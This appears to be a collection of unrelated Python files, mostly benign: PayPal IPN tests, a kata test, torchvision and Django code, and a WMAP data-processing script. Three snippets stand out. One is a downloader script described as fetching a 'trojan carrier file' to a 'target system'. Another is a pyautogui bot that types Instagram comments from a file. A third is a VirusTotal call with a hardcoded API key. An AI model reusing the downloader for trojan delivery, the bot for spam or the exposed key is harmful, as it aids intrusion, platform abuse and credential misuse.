self.old_locale = locale.getlocale(locale.LC_TIME)
try:
locale.setlocale(locale.LC_TIME, ('fr_FR', 'UTF-8'))
except Exception:
raise unittest.SkipTest("fr_FR locale not available for testing")
# Put super call at the end, so that it isn't called if we skip the test
# (since tearDown is not called in that case).
super(IPNLocaleTest, self).setUp()
def tearDown(self):
locale.setlocale(locale.LC_TIME, self.old_locale)
super(IPNLocaleTest, self).tearDown()
def test_valid_ipn_received(self):
ipn_obj = self.assertGotSignal(valid_ipn_received, False)
self.assertEqual(ipn_obj.last_name, u"User")
# Check date parsing
self.assertEqual(ipn_obj.payment_date,
datetime(2009, 2, 3, 7, 4, 6,
tzinfo=timezone.utc if settings.USE_TZ else None))
@override_settings(ROOT_URLCONF='paypal.standard.ipn.tests.test_urls')
class IPNPostbackTest(IPNUtilsMixin, TestCase):
"""
Tests an actual postback to PayPal server.
"""
def test_postback(self):
# Incorrect signature means we will always get failure
self.assertFlagged({}, u'Invalid postback. (INVALID)')
@override_settings(ROOT_URLCONF='paypal.standard.ipn.tests.test_urls')
class IPNSimulatorTests(TestCase):
# Some requests, as sent by the simulator.
# The simulator itself has bugs. For example, it doesn't send the 'charset'
# parameter, unlike in production. We could wait for PayPal to fix these
# bugs... ha ha, only kidding! If developers want to use the simulator, we
# need to deal with whatever it sends.
def get_ipn(self):
return PayPalIPN.objects.all().get()
def post_to_ipn_handler(self, post_data):
return self.client.post("/ipn/", post_data, content_type='application/x-www-form-urlencoded')
def test_valid_webaccept(self):
paypal_input = b'payment_type=instant&payment_date=23%3A04%3A06%20Feb%2002%2C%202009%20PDT&' \
b'payment_status=Completed&address_status=confirmed&payer_status=verified&' \
b'first_name=John&last_name=Smith&payer_email=buyer%40paypalsandbox.com&' \
b'payer_id=TESTBUYERID01&address_name=John%20Smith&address_country=United%20States&' \
b'address_country_code=US&address_zip=95131&address_state=CA&address_city=San%20Jose&' \
b'address_street=123%20any%20street&business=seller%40paypalsandbox.com&' \
b'receiver_email=seller%40paypalsandbox.com&receiver_id=seller%40paypalsandbox.com&' \
b'residence_country=US&item_name=something&item_number=AK-1234&quantity=1&shipping=3.04&' \
b'tax=2.02&mc_currency=USD&mc_fee=0.44&mc_gross=12.34&mc_gross1=12.34&txn_type=web_accept&' \
                       b'txn_id=593976436&notify_version=2.1&custom=xyz123&invoice=abc1234&test_ipn=1&' \
b'verify_sign=AFcWxV21C7fd0v3bYYYRCpSSRl31Awsh54ABFpebxm5s9x58YIW-AWIb'
response = self.post_to_ipn_handler(paypal_input)
self.assertEqual(response.status_code, 200)
ipn = self.get_ipn()
self.assertFalse(ipn.flag)
self.assertEqual(ipn.mc_gross, Decimal("12.34"))
# For tests, we get conversion to UTC because this is all SQLite supports.
self.assertEqual(ipn.payment_date, datetime(2009, 2, 3, 7, 4, 6,
tzinfo=timezone.utc if settings.USE_TZ else None))
def test_declined(self):
paypal_input = b'payment_type=instant&payment_date=23%3A04%3A06%20Feb%2002%2C%202009%20PDT&' \
b'payment_status=Declined&address_status=confirmed&payer_status=verified&' \
b'first_name=John&last_name=Smith&payer_email=buyer%40paypalsandbox.com&' \
b'payer_id=TESTBUYERID01&address_name=John%20Smith&address_country=United%20States&' \
b'address_country_code=US&address_zip=95131&address_state=CA&address_city=San%20Jose&' \
b'address_street=123%20any%20street&business=seller%40paypalsandbox.com&' \
b'receiver_email=seller%40paypalsandbox.com&receiver_id=seller%40paypalsandbox.com&' \
b'residence_country=US&item_name=something&item_number=AK-1234&quantity=1&shipping=3.04&' \
b'tax=2.02&mc_currency=USD&mc_fee=0.44&mc_gross=131.22&mc_gross1=131.22&txn_type=web_accept&' \
                       b'txn_id=153826001&notify_version=2.1&custom=xyz123&invoice=abc1234&test_ipn=1&' \
b'verify_sign=AiPC9BjkCyDFQXbSkoZcgqH3hpacAIG977yabdROlR9d0bf98jevF2-i'
self.post_to_ipn_handler(paypal_input)
ipn = self.get_ipn()
self.assertFalse(ipn.flag)
|
import unittest
from katas.kyu_6.autocomplete_yay import autocomplete
class AutocompleteTestCase(unittest.TestCase):
def test_equals(self):
self.assertEqual(autocomplete(
'ai', ['airplane', 'airport', 'apple', 'ball']),
['airplane', 'airport'])
def test_equals_2(self):
self.assertEqual(autocomplete('ai', [
'abnormal', 'arm-wrestling', 'absolute', 'airplane',
'airport', 'amazing', 'apple', 'ball']),
['airplane', 'airport'])
def test_equals_3(self):
self.assertEqual(autocomplete('a', [
'abnormal', 'arm-wrestling', 'absolute', 'airplane', 'airport',
'amazing', 'apple', 'ball']), [
'abnormal', 'arm-wrestling', 'absolute', 'airplane', 'airport'])
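# Hedged sketch (the kata's own implementation lives in
# katas.kyu_6.autocomplete_yay): a minimal version consistent with the tests
# returns at most five dictionary entries starting with the prefix, ignoring case.
def _reference_autocomplete(prefix, dictionary):
    matches = [w for w in dictionary if w.lower().startswith(prefix.lower())]
    return matches[:5]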
|
from __future__ import annotations
import os
import sys
from typing import Any, BinaryIO, Optional, Tuple, Type, TypeVar, Union
import PIL.Image
import torch
from torchvision.prototype.utils._internal import fromfile, ReadOnlyTensorBuffer
from torchvision.tv_tensors._tv_tensor import TVTensor
D = TypeVar("D", bound="EncodedData")
class EncodedData(TVTensor):
@classmethod
def _wrap(cls: Type[D], tensor: torch.Tensor) -> D:
return tensor.as_subclass(cls)
def __new__(
cls,
data: Any,
*,
dtype: Optional[torch.dtype] = None,
device: Optional[Union[torch.device, str, int]] = None,
requires_grad: bool = False,
) -> EncodedData:
tensor = cls._to_tensor(data, dtype=dtype, device=device, requires_grad=requires_grad)
# TODO: warn / bail out if we encounter a tensor with shape other than (N,) or with dtype other than uint8?
return cls._wrap(tensor)
@classmethod
def wrap_like(cls: Type[D], other: D, tensor: torch.Tensor) -> D:
return cls._wrap(tensor)
@classmethod
def from_file(cls: Type[D], file: BinaryIO, **kwargs: Any) -> D:
encoded_data = cls(fromfile(file, dtype=torch.uint8, byte_order=sys.byteorder), **kwargs)
file.close()
return encoded_data
@classmethod
def from_path(cls: Type[D], path: Union[str, os.PathLike], **kwargs: Any) -> D:
with open(path, "rb") as file:
return cls.from_file(file, **kwargs)
class EncodedImage(EncodedData):
# TODO: Use @functools.cached_property if we can depend on Python 3.8
@property
def spatial_size(self) -> Tuple[int, int]:
if not hasattr(self, "_spatial_size"):
with PIL.Image.open(ReadOnlyTensorBuffer(self)) as image:
self._spatial_size = image.height, image.width
return self._spatial_size
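# Hedged sketch for the TODO above: once Python >= 3.8 can be assumed, the
# manual _spatial_size caching could be replaced with functools.cached_property.
#
#   from functools import cached_property
#
#   class EncodedImage(EncodedData):
#       @cached_property
#       def spatial_size(self) -> Tuple[int, int]:
#           with PIL.Image.open(ReadOnlyTensorBuffer(self)) as image:
#               return image.height, image.width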
|
#!/usr/bin/env python3
"""A simple script used to download files to the target system.
Uses Python 3"""
import argparse
import requests
def get_arguments():
"""Get user supplied arguments from terminal."""
parser = argparse.ArgumentParser()
# arguments
parser.add_argument('-t', '--target', dest='target', help='File to obtain from the Internet.')
    options = parser.parse_args()  # argparse returns a single Namespace, not an (options, args) tuple
    return options
def download(url):
"""Obtains a document from the Internet to use as a trojan carrier file."""
get_response = requests.get(url)
file_name = url.split('/')[-1]
with open(file_name, 'wb') as out_file:
"""Writes output to file on local disk"""
out_file.write(get_response.content)
options = get_arguments()
download(options.target)
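# Hedged usage example (the URL is a placeholder):
#   python downloader.py -t https://example.com/files/report.pdf
# downloads report.pdf into the current working directory.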
|
import pyautogui, time
import random
time.sleep(5)
f=open("instagram_comments.txt",'r')
for word in f:
ccc = random.randrange(1,5,2)
cc = random.randrange(1,8, 3)
c = random.randrange(20,30, cc)
    print('2. Sleeping time: ')
print(c)
pyautogui.typewrite(word)
time.sleep(ccc)
print('1.Sleeping time: ')
print(ccc)
pyautogui.press("enter")
time.sleep(c)
pyautogui.dragTo(1650, 860, button='left')
|
# Generated by Django 3.1.7 on 2021-04-01 21:58
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('Gestion', '0001_initial'),
]
operations = [
migrations.AlterField(
model_name='hijo',
name='id',
field=models.AutoField(primary_key=True, serialize=False),
),
migrations.AlterField(
model_name='padre',
name='id',
field=models.AutoField(primary_key=True, serialize=False),
),
]
|
#!/usr/bin/python
import simplejson
import urllib
import urllib2
url = "https://www.virustotal.com/vtapi/v2/url/scan"
parameters = {"url": "https://www.virustotal.com/vtapi/v2/url/scan", "apikey": "af492b1351def36003ae0d7e8210bf000c8c52d5c1a7e37a057af865f90c5937"}
|
# coding=utf-8
"""
Problem:
Given a number n, print the decimal numbers from 1 up to the largest n-digit number, in order.
For example, for n = 3, print 1, 2, 3, ... up to the largest 3-digit number, 999.
"""
import sys
def increment(number_char_array):
    # carry digit
carry = 0
is_overflow = False
for index in reversed(range(len(number_char_array))):
number = int(number_char_array[index]) + carry
if index == len(number_char_array) - 1:
number += 1
if number >= 10:
if index == 0:
is_overflow = True
number -= 10
number_char_array[index] = str(number)
carry = 1
else:
number_char_array[index] = str(number)
break
return is_overflow
def print_number_char_array(number_char_array):
is_begin = False
for index in range(len(number_char_array)):
if not is_begin and number_char_array[index] != '0':
is_begin = True
if is_begin:
sys.stdout.write(number_char_array[index])
print
def print_1_to_max_of_n_digits(n):
if n <= 0:
return
number_char_array = ['0' for _ in range(n)]
while (not increment(number_char_array)):
print_number_char_array(number_char_array)
def print_1_to_max_of_n_digits_recursively(n):
if n <= 0:
return
number_char_array = ['0' for _ in range(n)]
    # process() already enumerates every digit at position 0 itself, so one call covers all cases
    process(number_char_array, n, 0)
def process(number_char_array, length, index):
if index == length:
print_number_char_array(number_char_array)
return
for i in range(10):
number_char_array[index] = str(i)
process(number_char_array, length, index + 1)
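# Hedged cross-check: for small n the same output can be produced directly with
# Python integers, which is handy for verifying the character-array versions above.
def print_1_to_max_of_n_digits_simple(n):
    if n <= 0:
        return
    for number in range(1, 10 ** n):
        print(number)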
if __name__ == '__main__':
print_1_to_max_of_n_digits_recursively(2)
|
import matplotlib.pyplot as plt
import numpy as np
from astropy.io import fits
import h5py
import healpy as hp
from pytest import approx
from glob import glob
import multiprocessing as mp
from multiprocessing import Pool
from joblib import Parallel, delayed
import huffman
from scipy.interpolate import interp1d
import os
prefix = '/mn/stornext/d16/cmbco/bp/wmap/'
from time import sleep
from time import time as timer
from mpi4py import MPI
rank = MPI.COMM_WORLD.rank
def write_file_parallel(file_ind, i, obsid, obs_ind, daflags, TODs, gain_guesses,
band_labels, band, psi_A, psi_B, pix_A, pix_B, fknee, alpha, n_per_day,
ntodsigma, npsi, psiBins, nside, fsamp, pos, vel, time):
file_out = prefix + f'data/wmap_{band}_{str(file_ind//10+1).zfill(6)}.h5'
with open(prefix + f'data/filelist_{band}.txt', 'a') as file_list:
file_list.write(f'{str(obs_ind).zfill(6)}\t"{file_out}"\t1\t0\t0\n')
dt0 = np.diff(time).mean()
det_list = []
# make huffman code tables
pixArray_A = [[], [], []]
pixArray_B = [[], [], []]
todArray = []
for j in range(len(band_labels)):
label = band_labels[j]
if label[:-2] == band.upper():
TOD = TODs[j]
gain = gain_guesses[j]
sigma_0 = TOD.std()
scalars = np.array([gain, sigma_0, fknee, alpha])
tod = np.zeros(TOD.size)
for n in range(len(TOD[0])):
tod[n::len(TOD[0])] = TOD[:,n]
todi = np.array_split(tod, n_per_day)[i]
todInd = np.int32(ntodsigma*todi/(sigma_0*gain))
delta = np.diff(todInd)
delta = np.insert(delta, 0, todInd[0])
todArray.append(delta)
pix = np.array_split(pix_A[j//4], n_per_day)[i]
delta = np.diff(pix)
delta = np.insert(delta, 0, pix[0])
pixArray_A[0].append(delta)
pix = np.array_split(pix_B[j//4], n_per_day)[i]
delta = np.diff(pix)
delta = np.insert(delta, 0, pix[0])
pixArray_B[0].append(delta)
psi = np.array_split(psi_A[j//4], n_per_day)[i]
psi = np.where(psi < 0, 2*np.pi+psi, psi)
psi = np.where(psi >= 2*np.pi, psi - 2*np.pi, psi)
psiIndexes = np.digitize(psi, psiBins)
delta = np.diff(psiIndexes)
delta = np.insert(delta, 0, psiIndexes[0])
pixArray_A[1].append(delta)
psi = np.array_split(psi_B[j//4], n_per_day)[i]
psi = np.where(psi < 0, 2*np.pi+psi, psi)
psi = np.where(psi >= 2*np.pi, psi - 2*np.pi, psi)
psiIndexes = np.digitize(psi, psiBins)
delta = np.diff(psiIndexes)
delta = np.insert(delta, 0, psiIndexes[0])
pixArray_B[1].append(delta)
flags = np.array_split(daflags[:,j//4], n_per_day)[i]
t0 = np.arange(len(flags))
t = np.linspace(t0.min(), t0.max(), len(todi))
func = interp1d(t0, flags, kind='previous')
flags = func(t)
delta = np.diff(flags)
delta = np.insert(delta, 0, flags[0])
pixArray_A[2].append(delta)
pixArray_B[2].append(delta)
h_A = huffman.Huffman("", nside)
h_A.GenerateCode(pixArray_A)
h_B = huffman.Huffman("", nside)
h_B.GenerateCode(pixArray_B)
h_Tod = huffman.Huffman("", nside)
h_Tod.GenerateCode(todArray)
huffarray_A = np.append(np.append(np.array(h_A.node_max), h_A.left_nodes), h_A.right_nodes)
huffarray_B = np.append(np.append(np.array(h_B.node_max), h_B.left_nodes), h_B.right_nodes)
huffarray_Tod = np.append(np.append(np.array(h_Tod.node_max), h_Tod.left_nodes), h_Tod.right_nodes)
with h5py.File(file_out, 'a') as f:
for j in range(len(band_labels)):
label = band_labels[j]
if label[:-2] == band.upper():
TOD = TODs[j]
gain = gain_guesses[j]
sigma_0 = TOD.std()
scalars = np.array([gain, sigma_0, fknee, alpha])
tod = np.zeros(TOD.size)
for n in range(len(TOD[0])):
tod[n::len(TOD[0])] = TOD[:,n]
todi = np.array_split(tod, n_per_day)[i]
todInd = np.int32(ntodsigma*todi/(sigma_0*gain))
deltatod = np.diff(todInd)
deltatod = np.insert(deltatod, 0, todInd[0])
pix = np.array_split(pix_A[j//4], n_per_day)[i]
deltapixA = np.diff(pix)
deltapixA = np.insert(deltapixA, 0, pix[0])
pix = np.array_split(pix_B[j//4], n_per_day)[i]
deltapixB = np.diff(pix)
deltapixB = np.insert(deltapixB, 0, pix[0])
psi = np.array_split(psi_A[j//4], n_per_day)[i]
psi = np.where(psi < 0, 2*np.pi+psi, psi)
psi = np.where(psi >= 2*np.pi, psi - 2*np.pi, psi)
psiIndexes = np.digitize(psi, psiBins)
deltapsiA = np.diff(psiIndexes)
deltapsiA = np.insert(deltapsiA, 0, psiIndexes[0])
psi = np.array_split(psi_B[j//4], n_per_day)[i]
psi = np.where(psi < 0, 2*np.pi+psi, psi)
psi = np.where(psi >= 2*np.pi, psi - 2*np.pi, psi)
psiIndexes = np.digitize(psi, psiBins)
deltapsiB = np.diff(psiIndexes)
deltapsiB = np.insert(deltapsiB, 0, psiIndexes[0])
flags = np.array_split(daflags[:,j//4], n_per_day)[i]
t0 = np.arange(len(flags))
t = np.linspace(t0.min(), t0.max(), len(todi))
func = interp1d(t0, flags, kind='previous')
flags = func(t)
deltaflag = np.diff(flags)
deltaflag = np.insert(deltaflag, 0, flags[0])
f.create_dataset(obsid + '/' + label.replace('KA','Ka') + '/flag',
data=np.void(bytes(h_A.byteCode(deltaflag))))
f.create_dataset(obsid + '/' + label.replace('KA','Ka')+ '/tod',
data=np.void(bytes(h_Tod.byteCode(deltatod))))
f.create_dataset(obsid + '/' + label.replace('KA','Ka')+ '/pixA',
data=np.void(bytes(h_A.byteCode(deltapixA))))
f.create_dataset(obsid + '/' + label.replace('KA','Ka')+ '/pixB',
data=np.void(bytes(h_B.byteCode(deltapixB))))
f.create_dataset(obsid + '/' + label.replace('KA','Ka')+ '/psiA',
data=np.void(bytes(h_A.byteCode(deltapsiA))))
f.create_dataset(obsid + '/' + label.replace('KA','Ka')+ '/psiB',
data=np.void(bytes(h_B.byteCode(deltapsiB))))
det_list.append(label.replace('KA','Ka'))
f.create_dataset(obsid + '/' + label.replace('KA','Ka')+ '/scalars',
data=scalars)
f[obsid + '/' + label.replace('KA','Ka') + '/scalars'].attrs['legend'] = 'gain, sigma0, fknee, alpha'
# filler
f.create_dataset(obsid + '/' + label.replace('KA','Ka') + '/outP',
data=np.array([0,0]))
f.create_dataset(obsid + '/common/hufftree_A', data=huffarray_A)
f.create_dataset(obsid + '/common/huffsymb_A', data=h_A.symbols)
f.create_dataset(obsid + '/common/hufftree_B', data=huffarray_B)
f.create_dataset(obsid + '/common/huffsymb_B', data=h_B.symbols)
f.create_dataset(obsid + '/common/todtree', data=huffarray_Tod)
f.create_dataset(obsid + '/common/todsymb', data=h_Tod.symbols)
f.create_dataset(obsid + '/common/satpos',
data=np.array_split(pos,n_per_day)[i][0])
f[obsid + '/common/satpos'].attrs['info'] = '[x, y, z]'
f[obsid + '/common/satpos'].attrs['coords'] = 'galactic'
f.create_dataset(obsid + '/common/vsun',
data=np.array_split(vel,n_per_day)[i][0])
f[obsid + '/common/vsun'].attrs['info'] = '[x, y, z]'
f[obsid + '/common/vsun'].attrs['coords'] = 'galactic'
dt = dt0/len(TOD[0])
time_band = np.arange(time.min(), time.min() + dt*len(tod), dt)
f.create_dataset(obsid + '/common/time',
data=[np.array_split(time_band, n_per_day)[i][0],0,0])
f[obsid + '/common/time'].attrs['type'] = 'MJD, null, null'
f.create_dataset(obsid + '/common/ntod',
data=len(np.array_split(tod,n_per_day)[i]))
if "/common/fsamp" not in f:
f.create_dataset('/common/fsamp', data=fsamp*len(TOD[0]))
f.create_dataset('/common/nside', data=nside)
f.create_dataset('/common/npsi', data=npsi)
f.create_dataset('/common/det', data=np.string_(', '.join(det_list)))
f.create_dataset('/common/datatype', data='WMAP')
# fillers
f.create_dataset('/common/mbang', data=0)
f.create_dataset('/common/ntodsigma', data=100)
f.create_dataset('/common/polang', data=0)
return
def coord_trans(pos_in, coord_in, coord_out, lonlat=False):
r = hp.rotator.Rotator(coord=[coord_in, coord_out])
pos_out = r(pos_in.T).T
if lonlat:
if pos_out.shape[1] == 2:
return pos_out
elif pos_out.shape[1] == 3:
return hp.vec2dir(pos_out.T, lonlat=True).T
else:
return pos_out
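# Hedged round-trip check for coord_trans: rotating Celestial -> Galactic and
# back should recover the original unit vectors up to floating-point error.
def _check_coord_trans_roundtrip():
    vecs = np.array([[1.0, 0.0, 0.0], [0.0, 0.0, 1.0]])
    gal = coord_trans(vecs, 'C', 'G')
    back = coord_trans(gal, 'G', 'C')
    assert np.allclose(back, vecs)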
def Q2M(Q):
'''
PURPOSE:
Converts quaternions to rotation matrices.
CALLING SEQUENCE:
M =Q2M(Q)
INPUTS:
Q - Quaternions. May be a 2-D array dimensioned 4xN or
simply a vector dimensioned 4.
OUTPUTS:
M - Cube of attitude rotation matrices, 3x3xN (or 3x3
if only one input quaternion).
'''
q1=-Q[0,:]
q2=-Q[1,:]
q3=-Q[2,:]
q4= Q[3,:]
q11=q1*q1
q22=q2*q2
q33=q3*q3
q44=q4*q4
s=q11+q22+q33+q44
w = (abs(s-1.0) > 1.0e-5)
if sum(w) > 0:
s=np.sqrt(s)
q1=q1/s
q2=q2/s
q3=q3/s
q4=q4/s
q12=q1*q2
q13=q1*q3
q14=q1*q4
q23=q2*q3
q24=q2*q4
q34=q3*q4
M = np.zeros((len(q1), 3,3))
M[:,0,0] = q11 - q22 - q33 + q44
M[:,0,1] = 2. * ( q12 + q34 )
M[:,0,2] = 2. * ( q13 - q24 )
M[:,1,0] = 2. * ( q12 - q34 )
M[:,1,1] = -q11 + q22 - q33 + q44
M[:,1,2] = 2. * ( q23 + q14 )
M[:,2,0] = 2. * ( q13 + q24 )
M[:,2,1] = 2. * ( q23 - q14 )
M[:,2,2] = -q11 - q22 + q33 + q44
M = np.transpose(M, [1,2,0])
return M
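# Hedged sanity check for Q2M: the identity quaternion (x, y, z, w) = (0, 0, 0, 1)
# should map to the 3x3 identity rotation matrix.
def _check_q2m_identity():
    Q_identity = np.array([[0.0], [0.0], [0.0], [1.0]])  # shape (4, 1)
    M_identity = Q2M(Q_identity)[:, :, 0]                # output is (3, 3, N)
    assert np.allclose(M_identity, np.eye(3))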
def gamma_from_pol(gal, pol, fixed_basis=False):
'''
It should be possible to distribute the inner product among all time
observations, but the matrix algebra is escaping me right now. In any case,
for a one time operation this doesn't seem too slow yet.
'''
# gal and pol are galactic lonlat vectors
dir_A_gal = hp.ang2vec(gal[:,0],gal[:,1], lonlat=False)
dir_A_pol = hp.ang2vec(pol[:,0],pol[:,1], lonlat=False)
dir_Z = np.array([0,0,1])
sin_theta_A = np.sqrt(dir_A_gal[:,0]**2 + dir_A_gal[:,1]**2)
dir_A_west_x = dir_A_gal[:,1]/sin_theta_A
dir_A_west_y = -dir_A_gal[:,0]/sin_theta_A
dir_A_west_z = dir_A_gal[:,1]*0
dir_A_west = np.array([dir_A_west_x, dir_A_west_y, dir_A_west_z]).T
    dir_A_north = (dir_Z - dir_A_gal[:, 2:3]*dir_A_gal)/sin_theta_A[:,np.newaxis]  # subtract the z-component of each pointing, row-wise
'''
if sin_theta_A == 0:
dir_A_west = np.array([1,0,0])
dir_A_north = np.array([0,1,0])
assert dir_A_north.dot(dir_A_west) == approx(0), 'Vectors not orthogonal'
assert dir_A_north.dot(dir_A_north) == approx(1), 'North-vector not normalized'
assert dir_A_west.dot(dir_A_west) == approx(1), 'North-vector not normalized'
'''
sin_gamma_A = dir_A_pol[:,0]*dir_A_west[:,0] + dir_A_pol[:,1]*dir_A_west[:,1] + dir_A_pol[:,2]*dir_A_west[:,2]
cos_gamma_A = dir_A_pol[:,0]*dir_A_north[:,0] + dir_A_pol[:,1]*dir_A_north[:,1] + dir_A_pol[:,2]*dir_A_north[:,2]
cos_2_gamma_A = 2*cos_gamma_A**2 - 1
sin_2_gamma_A = 2*sin_gamma_A*cos_gamma_A
return sin_2_gamma_A, cos_2_gamma_A
def q_interp(q_arr, t):
'''
Copied from interpolate_quaternions.pro
This is an implementation of Lagrange polynomials.
; input_q - Set of 4 evenly-spaced quaternions (in a 4x4 array).
; See the COMMENTS section for how this array should
; be arranged.
; offset - Dimensionless time offset relative to the first quaternion.
; This routine expects a unifomly sampled set of quaternions Q1,Q2,Q3,Q4.
; It interpolate a quaternion for any time between Q1 and Q4, inclusive.
; The output is calculated at a time T_Out, expressed in terms of the
; sampling of the input quaternions:
;
; T_Out - T(Q1)
; Offset = -----------------
; T(Q2) - T(Q1)
;
; where T(Q1) is the time at quaternion Q1, and so forth. That is,
; the time for the output quaternion (variable OFFSET) should be
; a number in the range -1.000 to 4.000 inclusive. Input values outside
; that range result in an error. Input values outside 0.0 to 3.0 result
; in extrapolation instead of interpolation.
;
; In other words, Offset is essentially a floating point subscript,
; similar to the those used by the IDL intrinsic routine INTERPOLATE.
;
; For optimal results, OFFSET should be in the range [1.0, 2.0] -- that
; is, the input quaternions Q1...Q4 should be arranged such that 2 come
; before the desired output and 2 come after.
'''
xp0 = t-1
xn0 = -xp0
xp1 = xp0 + 1
xn1 = xp0 - 1
xn2 = xp0 - 2
w = np.array([xn0*xn1*xn2/6, xp1*xn1*xn2/2, xp1*xn0*xn2/2, xp1*xp0*xn1/6])
Qi = q_arr.dot(w)
Qi = Qi/np.sum(Qi**2, axis=0)**0.5
return Qi
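# Hedged illustration of q_interp: with four copies of the identity quaternion,
# interpolation at any offset in [1, 2] returns the identity quaternion again.
def _check_q_interp_constant():
    q_arr = np.tile(np.array([[0.0], [0.0], [0.0], [1.0]]), (1, 4))  # shape (4, 4)
    Qi = q_interp(q_arr, 1.5)
    assert np.allclose(Qi, [0.0, 0.0, 0.0, 1.0])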
def quat_to_sky_coords(quat, center=True):
    '''
    Quaternion is of form (N_frames, 30, 4), with one redundant frame at the
    beginning and two redundant ones at the end, that match the adjacent frames.
    '''
    Nobs_array = np.array([12, 12, 15, 15, 20, 20, 30, 30, 30, 30])
nt = len(quat)
Q = np.zeros( (4, 33, nt))
q0 = quat[:,0::4]
q1 = quat[:,1::4]
q2 = quat[:,2::4]
q3 = quat[:,3::4]
q0 = np.array([q0[0,0]] + q0[:,1:-2].flatten().tolist() +
q0[-1,-2:].tolist())
q1 = np.array([q1[0,0]] + q1[:,1:-2].flatten().tolist() +
q1[-1,-2:].tolist())
q2 = np.array([q2[0,0]] + q2[:,1:-2].flatten().tolist() +
q2[-1,-2:].tolist())
q3 = np.array([q3[0,0]] + q3[:,1:-2].flatten().tolist() +
q3[-1,-2:].tolist())
Q = np.zeros((4, 30*nt + 3))
Q[0] = q0
Q[1] = q1
Q[2] = q2
Q[3] = q3
t0 = np.arange(30*nt + 3)
da_str = ''
dir_A_los = np.array([
[ 0.03997405, 0.92447851, -0.37913264],
[-0.03834152, 0.92543237, -0.37696797],
[-0.03156996, 0.95219303, -0.30386144],
[ 0.03194693, 0.95220414, -0.3037872 ],
[-0.03317037, 0.94156392, -0.33519711],
[ 0.03336979, 0.94149584, -0.33536851],
[-0.0091852 , 0.93943624, -0.34260061],
[-0.00950387, 0.94586233, -0.32442894],
[ 0.00980826, 0.9457662 , -0.32470001],
[ 0.00980739, 0.93934639, -0.34282965]])
dir_B_los = np.array([
[ 0.03795967, -0.92391895, -0.38070045],
[-0.0400215 , -0.92463091, -0.37875581],
[-0.03340367, -0.95176817, -0.30499432],
[ 0.03014983, -0.95193039, -0.30482702],
[-0.03504541, -0.94094355, -0.33674479],
[ 0.03143652, -0.94113826, -0.33655687],
[-0.01148033, -0.93883144, -0.3441856 ],
[-0.01158651, -0.94535168, -0.32584651],
[ 0.00767888, -0.9454096 , -0.32579398],
[ 0.00751565, -0.93889159, -0.34413092]])
dir_A_pol = np.array([
[ 0.69487757242271, -0.29835139515692, -0.65431766318192, ],
[ -0.69545992357813, -0.29560553030986, -0.65494493291187, ],
[ 0.71383872060219, -0.19131247543171, -0.67367189173456, ],
[ -0.71390969181845, -0.19099503229669, -0.67368675923286, ],
[ -0.69832280289930, -0.26176968417604, -0.66619959126169, ],
[ 0.69826122350352, -0.26204606404493, -0.66615548040223, ],
[ 0.70944248806767, -0.23532277684296, -0.66431509603747, ],
[ -0.70476543555624, -0.23649685267332, -0.66886091193973, ],
[ 0.70468980214241, -0.23690904054153, -0.66879472879665, ],
[ -0.70959923775957, -0.23501806310177, -0.66425554705017]])
dir_B_pol = np.array([
[ 0.69546590081501, 0.29798590641998, -0.65385899120425,],
[ -0.69486414021667, 0.29814186328140, -0.65442742607568, ],
[ 0.71423586688235, 0.19072845484161, -0.67341650037147, ],
[ -0.71357469183546, 0.19306390125546, -0.67345192048426, ],
[ -0.69775710213559, 0.26425762446771, -0.66580998365151, ],
[ 0.69876566230957, 0.26145991550208, -0.66585678772745, ],
[ 0.71002796142313, 0.23471528678222, -0.66390438178103, ],
[ -0.70422900931886, 0.23906270891214, -0.66851366750529, ],
[ 0.70521159225086, 0.23611413753036, -0.66852578425466, ],
[ -0.70903152581832, 0.23766935833457, -0.66391834701609]])
M = Q2M(Q)
M = np.transpose(M, [2,0,1])
gal_A = []
pol_A = []
gal_B = []
pol_B = []
for n, Nobs in enumerate(Nobs_array):
# for each group from 0--4, the interpolation is valid between 1.5--2.5,
# which is equivalent to cutting out the first 1.5 time units from the
# beginning of the total array and the final set of quaternions does not
# need the last half of the time interval.
t = np.arange(t0.min() + 1.5, t0.max() - 0.5, 1/Nobs)
M2 = np.zeros((len(t), 3, 3))
for i in range(3):
for j in range(3):
f = interp1d(t0, M[:,i,j], kind='cubic')
M2[:,i,j] = f(t)
Npts = 30*nt*Nobs
dir_A_los_cel = []
dir_B_los_cel = []
dir_A_los_cel = np.sum(M2*np.tile(dir_A_los[n, np.newaxis, np.newaxis,:], (Npts,3,1)),axis=2)
dir_B_los_cel = np.sum(M2*np.tile(dir_B_los[n, np.newaxis, np.newaxis,:], (Npts,3,1)),axis=2)
dir_A_los_gal = coord_trans(dir_A_los_cel, 'C', 'G')
Pll_A = np.array(hp.vec2ang(dir_A_los_gal, lonlat=False))
dir_B_los_gal = coord_trans(dir_B_los_cel, 'C', 'G')
Pll_B = np.array(hp.vec2ang(dir_B_los_gal, lonlat=False))
gal_A.append(Pll_A.T)
gal_B.append(Pll_B.T)
dir_A_pol_cel = np.sum(M2*np.tile(dir_A_pol[n, np.newaxis, np.newaxis,:], (Npts,3,1)),axis=2)
dir_B_pol_cel = np.sum(M2*np.tile(dir_B_pol[n, np.newaxis, np.newaxis,:], (Npts,3,1)),axis=2)
dir_A_pol_gal = coord_trans(dir_A_pol_cel, 'C', 'G')
Pll_A = np.array(hp.vec2ang(dir_A_pol_gal, lonlat=False))
dir_B_pol_gal = coord_trans(dir_B_pol_cel, 'C', 'G')
Pll_B = np.array(hp.vec2ang(dir_B_pol_gal, lonlat=False))
pol_A.append(Pll_A.T)
pol_B.append(Pll_B.T)
return gal_A, gal_B, pol_A, pol_B
def get_psi(gal, pol, band_labels):
    psi = []
    for band in range(len(band_labels)):
        sin2g, cos2g = gamma_from_pol(gal[band], pol[band])
        psi.append(0.5*np.arctan2(sin2g, cos2g))
    return psi
def get_psi_multiprocessing(gal, pol):
sin_2_gamma = np.zeros(len(gal))
cos_2_gamma = np.zeros(len(gal))
for t in range(len(sin_2_gamma)):
sin_2_gi, cos_2_gi = gamma_from_pol(gal[t], pol[t])
sin_2_gamma[t] = sin_2_gi
cos_2_gamma[t] = cos_2_gi
psi = 0.5*np.arctan2(sin_2_gamma, cos_2_gamma)
return psi
def get_psi_multiprocessing_2(i):
gal = gals[i]
pol = pols[i]
sin_2_gamma = np.zeros(len(gal))
cos_2_gamma = np.zeros(len(gal))
for t in range(len(sin_2_gamma)):
sin_2_gi, cos_2_gi = gamma_from_pol(gal[t], pol[t])
sin_2_gamma[t] = sin_2_gi
cos_2_gamma[t] = cos_2_gi
psi = 0.5*np.arctan2(sin_2_gamma, cos_2_gamma)
return psi
def ang2pix_multiprocessing(nside, theta, phi):
return hp.ang2pix(nside, theta, phi)
